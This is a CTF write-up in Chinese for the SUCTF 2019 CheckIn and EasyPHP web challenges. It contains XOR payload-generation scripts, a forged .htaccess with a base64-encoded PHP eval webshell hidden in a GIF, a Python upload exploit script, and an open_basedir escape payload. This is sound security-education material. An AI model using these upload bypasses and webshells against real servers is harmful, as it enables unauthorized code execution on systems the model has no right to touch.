SUCTF2019復(fù)盤(pán)

WEB

CheckIn

  • 解題過(guò)程
    題目功能是一個(gè)文件上傳,可以上傳jpg、png等文件,但是限制了php,而且還判斷了上傳的文件頭,使用exif_image來(lái)判斷的,這個(gè)很容易繞過(guò),直接隨便加一個(gè)圖片文件頭就行,并且上傳之后會(huì)給出文件所在目錄
    ,且上傳的內(nèi)容中不能包含<?字符

嘗試了.htaccess,發(fā)現(xiàn)不行,換思路,使用.user.ini修改配置文件

或者連接shell管理客戶(hù)端

注意點(diǎn):

  1. .user.ini實(shí)際上就是一個(gè)可以由用戶(hù)“自定義”的php.ini,我們能夠自定義的設(shè)置是模式為“PHP_INI_PERDIR 、 PHP_INI_USER”的設(shè)置
  2. 前提是含有.user.ini的文件夾下需要有正常的php文件,否則也不能包含了

參考資料:.user.ini文件構(gòu)成的PHP后門(mén)

EasyPHP

  • 解題過(guò)程
    首先進(jìn)行代碼審計(jì),如下
<?php
function getTheFlag() {
    // webadmin will remove your upload file every 20 min!!!!
    $userdir = "upload/tmp_" . md5($_SERVER['REMOTE_ADDR']);
    if (!file_exists($userdir)) {
        mkdir($userdir);
    }
    if (!empty($_FILES["file"])) {
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name, ".") + 1); //substr()返回字符串的子串  strrpos()計(jì)算指定字符串在目標(biāo)字符串中最后一次出現(xiàn)的位置   $extension返回文件的后綴名
        if (preg_match("/ph/i", $extension)) {
            die("^_^");
        }
        //文件后綴名中不能出現(xiàn)大小寫(xiě)的ph字符
        if (mb_strpos(file_get_contents($tmp_name), '<?') !== False) {
            die("^_^");
        } //file_get_contents — 將整個(gè)文件讀入一個(gè)字符串  mb_strpos — 查找字符串在另一個(gè)字符串中首次出現(xiàn)的位置
        //文件內(nèi)容中不能出現(xiàn)'<?'字符
        if (!exif_imagetype($tmp_name)) {
            die("^_^");
        } //exif_imagetype — 判斷一個(gè)圖像的類(lèi)型
        //要構(gòu)造圖像文件頭
        $path = $userdir . "/" . $name;
        @move_uploaded_file($tmp_name, $path); //搬動(dòng)臨時(shí)文件到新目錄下
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh) {
    highlight_file(__FILE__);
}

if (strlen($hhh) > 18) {
    die('One inch long, one inch strong!');
}

if (preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh)) {
    die('Try something else!');
}

$character_type = count_chars($hhh, 3); //count_chars — 返回字符串所用字符的信息 3 - 返回由所有使用了的字節(jié)值組成的字符串。
if (strlen($character_type) > 12) {
    die("Almost there!");
}
//最多使用12個(gè)字符
eval($hhh);
?>

題目分成兩個(gè)部分,第一部分是執(zhí)行getTheFlag函數(shù),第二部分是上傳shell
先分析第一部分,類(lèi)似題目參看ISITDTU CTF 2019 EasyPHP 回顧


參考這兩篇文章:
PHP不使用數(shù)字,字母和下劃線寫(xiě)shell
一道題回顧php異或webshell


正則過(guò)濾了絕大部分可用字符串,可以使用多個(gè)字符異或進(jìn)行構(gòu)造,但是直接調(diào)用函數(shù)長(zhǎng)度明顯是不夠的,這里可以用GET的方式傳入我們想要調(diào)用的函數(shù),首先FUZZ出_GET,注意這里需要使字符串去重后小于等于12

Python版本
  target = "_GET"
    payload = ""
    for tar in target:
        for i in range(255):
            temp = 255^i
            if chr(temp) == tar:
                payload = payload+str(hex(i))
                break
    head = "%e9"*4
    payload = payload.replace("0x","%")
    print(head+"^"+payload)

php版本
<?php
$target = "_GET";
$payload = "%ff%ff%ff%ff^";
for ($i = 0; $i < strlen($target); $i++) {
    $re = substr($target, $i, 1);
    for ($j = 1; $j < 255; $j++) {
        $temp = $j ^ 255;
        $temp = chr($temp);
        if ($temp == $re) {
            $payload = $payload . "%" . dechex($j);
            break;
        }
    }
}
echo $payload;

構(gòu)造出如下payload:${%A0%B8%BA%AB^%ff%ff%ff%ff}{%A0}();&%A0=get_the_flag
接著是第二部分上傳文件了進(jìn)行g(shù)etshell

#index.html
<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <form action="http://a9ae29e2-eb3f-4736-843b-88d878315f7b.node1.buuoj.cn/?_=${%e9%e9%e9%e9^%b6%ae%ac%bd}{%bd}();&%bd=get_the_flag" method="post"
  enctype="multipart/form-data">  #enctype 屬性規(guī)定在發(fā)送到服務(wù)器之前應(yīng)該如何對(duì)表單數(shù)據(jù)進(jìn)行編碼
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file" /> 
    <br />
    <input type="submit" name="submit" value="Submit" />
  </form>
</body>
</html>

上傳這里需要繞過(guò)圖片頭和<?的檢測(cè)

    //.htaccess
#define xlogo_width 200
#define xlogo_height 200
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_f528764d624db129b32c21fbca0cb8d6/evil.gif"
    //evil.gif
GIF89a12PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7Pz4=

getshell后訪問(wèn)跟目錄時(shí)才發(fā)現(xiàn)是沒(méi)有權(quán)限的,查看phpinfo的信息可以看到開(kāi)啟了open_basedir

同時(shí)還禁用了一些函數(shù)

使用蟻劍插件繞過(guò)disable_functions
參考:繞過(guò)disable_functions 插件應(yīng)用 SUCTF EasyPHP
注意點(diǎn):連上去之后再傳一個(gè)PHP小馬,再使用插件進(jìn)行提權(quán)

import requests
import base64

url = "http://7adea2c4-8b2f-4da3-a59f-a1db1559a48b.node1.buuoj.cn/?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"


htaccess = b"""\x00\x00\x8a\x39\x8a\x39
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_fd40c7f4125a9b9ff1a4e75d293e3080/shell.gif"

"""

shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ base64.b64encode(b"<?php eval($_POST['c']);?>")
#shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ b"<script language='php'>eval($_REQUEST[c]);</script>"

files = [('file',('.htaccess',htaccess,'image/jpeg'))]

data = {"upload":"Submit"}

proxies = {"http":"http://127.0.0.1:8080"}
r = requests.post(url=url, data=data, files=files)#proxies=proxies)
# print r.text


files = [('file',('shell.gif',shell,'image/jpeg'))]
r = requests.post(url=url, data=data, files=files)
print(r.text)

payload:
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));
參考資料:
SUCTF2019部分web題解
SUCTF的一些題解
# SUCTF 2019 Writeup

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容